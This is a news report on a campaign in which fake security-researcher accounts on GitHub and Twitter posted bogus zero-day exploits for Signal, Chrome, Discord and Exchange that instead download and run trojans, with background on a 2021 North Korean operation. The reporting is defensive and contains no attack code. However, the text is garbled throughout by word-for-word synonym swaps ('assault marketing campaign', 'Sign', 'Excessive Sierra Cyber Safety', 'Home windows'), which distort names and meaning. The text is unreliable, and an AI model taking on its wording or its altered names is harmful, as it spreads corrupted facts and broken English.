In an uncommon assault marketing campaign, a hacker has been organising rogue GitHub repositories that declare to host zero-day exploits for well-liked purposes however which as a substitute ship malware. The attacker additionally created faux GitHub and Twitter accounts posing as safety researchers and even used actual pictures of researchers from well-known cybersecurity companies.
“The attacker has made a number of effort to create all these faux personas, solely to ship very apparent malware,” researchers from safety agency VulnCheck, who discovered the rogue repositories, stated in a report. “It’s unclear if they’ve been profitable however provided that they’ve continued to pursue this avenue of assaults, it appears they consider they are going to be profitable.”
Whereas assaults that focus on safety researchers aren’t a brand new growth, they’re comparatively uncommon and extra prone to be the work of superior persistent risk (APT) teams trying to achieve entry to delicate info that researchers have entry to. This was the case with a campaign reported by Google’s Threat Analysis Group in 2021 the place a government-backed North Korean entity created an online of faux accounts posing as safety researchers on Twitter, Telegram, LinkedIn, and different social media platforms and used them to advertise proof-of-concept exploits for current vulnerabilities that have been posted on a weblog and in YouTube movies.
How the GitHub faux account marketing campaign works
The faux accounts have been used to contact different actual researchers and invite them to collaborate. As a part of the communication, a Visible Studio venture with proof-of-concept exploit code was shared, however this venture additionally included a malicious DLL that deployed malware on the sufferer’s pc. Individually, some researchers who visited the weblog had their up-to-date techniques exploited suggesting the attackers had entry to some zero-day exploits.
VulnCheck got here throughout the primary rogue repository in early Might and reported it to GitHub, which promptly took it down. That repository claimed to host a zero-day distant code execution exploit for Sign, a preferred safe communications app that is effectively regarded within the safety group. The attacker then continued to arrange new accounts and repositories with faux exploits for Microsoft Change, Google Chrome, Discord, and Chromium.
All have been arrange by faux accounts claiming to belong to researchers who work for an organization known as Excessive Sierra Cyber Safety that does not appear to exist. A number of the identical names and profile info have been used to create Twitter accounts that have been then used to advertise the repositories, very like within the assault reported by Google.
Nonetheless, the 2021 assault appears to have concerned considerably extra sophistication than this newest marketing campaign and there is no proof it is the work of the identical attackers. The malicious code distributed from the rogue GitHub repositories as a file known as poc.py downloads one in every of two extra recordsdata relying on the working system, one known as cveslinux.zip, and one known as cveswindows.zip. These archive recordsdata are then unpacked and the file inside is executed. The Home windows payload is detected by 36 antivirus applications on VirusTotal as a trojan program, whereas the Linux binary is flagged by 25.
“It isn’t clear if it is a single particular person with an excessive amount of time on their arms or one thing extra superior just like the marketing campaign uncovered by Google TAG in January 2021,” the VulnCheck researchers stated. “Both method, safety researchers ought to perceive that they’re helpful targets for malicious actors and needs to be cautious when downloading code from GitHub. At all times evaluate the code you might be executing and don’t use something you don’t perceive.”
Skilled safety researchers typically take precautions when working with probably malicious code. In the event that they’re testing a proof-of-concept exploit, that is almost definitely to occur on a check system inside a digital machine that is effectively monitored and later wiped. Executing such code on a piece machine would almost definitely be a violation of normal safety insurance policies in most organizations, particularly inside a cybersecurity firm.
Copyright © 2023 IDG Communications, Inc.